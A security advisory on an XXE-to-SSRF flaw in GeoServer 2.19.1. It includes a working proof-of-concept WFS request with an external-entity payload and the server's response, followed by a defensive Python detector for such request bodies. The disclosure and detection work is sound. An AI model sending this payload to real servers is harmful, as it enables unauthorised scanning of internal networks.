The WPS component of GeoServer version 2.19.1 is vulnerable to XML External Entity (XXE) injection: an attacker can send crafted XML in the Filter parameter that references arbitrary external locations. The XXE is limited, since only references pointing to an XSD file are resolved and external DTD files are not permitted. Even so, the issue can still be exploited to perform SSRF attacks by scanning the local network for available hosts and open ports.
PoC:
HTTP Request:
POST /geoserver-geotec/wfs HTTP/1.1
Host: Example.com
Content-Length: 289
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Connection: close

request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-1"%3f>+<!DOCTYPE+foo+[+<!ENTITY+xxe+SYSTEM+"http://target.com/test.xsd"+>]><Filter+><PropertyIsEqualTo><PropertyName>%26xxe%3b<Literal>Brussels</Literal></Filter>
HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 20 Feb 2023 16:01:07 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 692
Connection: close
[...SNIP...]
Permissions-Policy: self
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache

<?xml version="1.0" ?>
<ServiceExceptionReport
version="1.2.0"
xmlns="http://www.opengis.net/ogc"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.opengis.net/ogc http://schemas.opengis.net/wfs/1.0.0/OGC-exception.xsd">
<ServiceException code="XML getFeature request SAX parsing error" locator="org.geoserver.ows.XmlRequestReader">
org.xml.sax.SAXParseException; systemId: http://target.com/test.xsd; lineNumber: 1; columnNumber: 3; The content of elements must consist of well-formed character data or markup.
The content of elements must consist of well-formed character data or markup.
</ServiceException></ServiceExceptionReport>
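The response above shows the server fetching the URL named in the entity before it even notices the filter is malformed, which is what makes the SSRF possible. The following Python, added here as an example and not code from GeoServer or from the advisory author, shows the check a WAF, reverse proxy or log review would apply to WFS request bodies: URL-decode the FILTER parameter the way the server does (`+` to space, `%26xxe%3b` back to `&xxe;`), then flag any DOCTYPE and list every SYSTEM/PUBLIC entity together with the host the parser would be made to contact. The two sample bodies are constructed (the first mirrors the PoC request, the second is a benign OGC filter), and the regex-based scan is a heuristic for detection, not a replacement for disabling DOCTYPE handling in the parser itself.

```python
"""Detect external-entity declarations in the FILTER parameter of WFS
GetFeature requests (the request shape shown in the PoC above).

Added example, not GeoServer code. Sample bodies below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed: the PoC body, with the same host the advisory uses.
POC_BODY = (
    "request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@"
    '&FILTER=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-1"%3f>'
    '+<!DOCTYPE+foo+[+<!ENTITY+xxe+SYSTEM+"http://target.com/test.xsd"+>]>'
    "<Filter+><PropertyIsEqualTo><PropertyName>%26xxe%3b<Literal>Brussels</Literal></Filter>"
)

# Constructed: an ordinary OGC filter with no DOCTYPE at all.
BENIGN_BODY = (
    "request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@"
    "&FILTER=<Filter><PropertyIsEqualTo><PropertyName>city</PropertyName>"
    "<Literal>Brussels</Literal></PropertyIsEqualTo></Filter>"
)

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM "uri"> or <!ENTITY name PUBLIC "pubid" "uri">;
# the optional leading "%" also catches parameter entities.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(\w+)\s+(SYSTEM|PUBLIC)\s+"([^"]*)"(?:\s+"([^"]*)")?',
    re.IGNORECASE,
)


def decode_filter(body: str) -> str:
    """Return the URL-decoded FILTER value ('' if absent).

    parse_qs turns '+' into spaces and %26xxe%3b back into &xxe;,
    so we inspect exactly the text the XML parser will see.
    """
    params = parse_qs(body, keep_blank_values=True)
    values = params.get("FILTER") or params.get("filter") or [""]
    return values[0]


def external_entities(xml_text: str) -> list:
    """List (name, uri) for each entity declaration naming an external resource."""
    found = []
    for m in ENTITY_RE.finditer(xml_text):
        is_param, name, kind, first, second = m.groups()
        # PUBLIC carries a public id first and the URI second; SYSTEM only the URI.
        uri = second if kind.upper() == "PUBLIC" else first
        found.append((("%" + name) if is_param else name, uri))
    return found


def inspect_wfs_body(body: str) -> dict:
    """Classify a request body.

    A DOCTYPE never belongs in OGC Filter XML, and any SYSTEM/PUBLIC entity
    means the server will be asked to fetch a URL of the client's choosing.
    """
    xml_text = decode_filter(body)
    entities = external_entities(xml_text)
    hosts = sorted({urlsplit(uri).hostname or uri for _, uri in entities})
    has_doctype = bool(DOCTYPE_RE.search(xml_text))
    if entities:
        verdict = "block"
    elif has_doctype:
        verdict = "review"
    else:
        verdict = "allow"
    return {
        "has_doctype": has_doctype,
        "entities": entities,
        "hosts": hosts,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_wfs_body(body))
```

Run against the PoC body the verdict is `block` with `target.com` listed as the host the parser would contact; the benign filter is allowed. The `hosts` list is what to forward to the SOC, since a burst of requests whose entity URIs walk through internal addresses and ports is the scanning behaviour the advisory describes. The durable fix remains on the parser side: reject DOCTYPE declarations (or at least external general and parameter entities) before any network resolution can occur.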